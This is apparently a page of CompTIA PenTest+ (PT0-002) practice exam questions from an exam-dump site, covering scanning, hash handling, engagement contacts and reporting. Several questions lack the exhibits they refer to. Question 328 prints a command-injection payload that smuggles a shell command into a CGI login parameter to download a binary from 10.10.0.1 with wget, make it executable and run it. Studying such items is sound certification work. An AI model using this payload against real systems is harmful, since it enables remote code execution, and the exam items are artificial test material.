PT0-002 Exam Details

  • Exam Code
    :PT0-002
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :455 Q&As
  • Last Updated
    :May 31, 2026

CompTIA PT0-002 Online Questions & Answers

  • Question 321:

    After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

    The tester then runs the following command from the previous exploited system, which fails: Which of the following explains the reason why the command failed?

    A. The tester input the incorrect IP address.
    B. The command requires the -port 135 option.
    C. An account for RDP does not exist on the server.
    D. PowerShell requires administrative privilege.

  • Question 322:

    A penetration tester writes the following script:

    Which of the following objectives is the tester attempting to achieve?

    A. Determine active hosts on the network.
    B. Set the TTL of ping packets for stealth.
    C. Fill the ARP table of the networked devices.
    D. Scan the system on the most used ports.

  • Question 323:

    Appending string values onto another string is called:

    A. compilation
    B. connection
    C. concatenation
    D. conjunction

  • Question 324:

    An Nmap scan of a network switch reveals the following:

    Which of the following technical controls will most likely be the FIRST recommendation for this device?

    A. Encrypted passwords
    B. System-hardening techniques
    C. Multifactor authentication
    D. Network segmentation

  • Question 325:

    A penetration tester is taking screen captures of hashes obtained from a domain controller.

    Which of the following best explains why the penetration tester should immediately obscure portions of the images before saving?

    A. To maintain confidentiality of data/information
    B. To avoid disclosure of how the hashes were obtained
    C. To make the hashes appear shorter and easier to crack
    D. To prevent analysis based on the type of hash

  • Question 326:

    A penetration tester captured the following traffic during a web-application test:

    Which of the following methods should the tester use to visualize the authorization information being transmitted?

    A. Decode the authorization header using UTF-8.
    B. Decrypt the authorization header using bcrypt.
    C. Decode the authorization header using Base64.
    D. Decrypt the authorization header using AES.

  • Question 327:

    Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

    A. The team exploits a critical server within the organization.
    B. The team exfiltrates PII or credit card data from the organization.
    C. The team loses access to the network remotely.
    D. The team discovers another actor on a system on the network.

  • Question 328:

    A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

    exploit = "POST "

    exploit += "/cgi-bin/index.cgi?action=loginandPath=%27%0A/bin/sh${IFS} ?

    c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache'%0A%27andloginUser=aandPwd=a"

    exploit += "HTTP/1.1"

    Which of the following commands should the penetration tester run post-engagement?

    A. grep -v apache ~/.bash_history > ~/.bash_history
    B. rm -rf /tmp/apache
    C. chmod 600 /tmp/apache
    D. taskkill /IM "apache" /F

  • Question 329:

    A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment. Which of the following BEST describes the action taking place?

    A. Maximizing the likelihood of finding vulnerabilities
    B. Reprioritizing the goals/objectives
    C. Eliminating the potential for false positives
    D. Reducing the risk to the client environment

  • Question 330:

    An organization's Chief Information Security Officer debates the validity of a critical finding from a penetration assessment that was completed six months ago.

    Which of the following post-report delivery activities would have most likely prevented this scenario?

    A. Client acceptance
    B. Data destruction process
    C. Attestation of findings
    D. Lessons learned

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-002 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.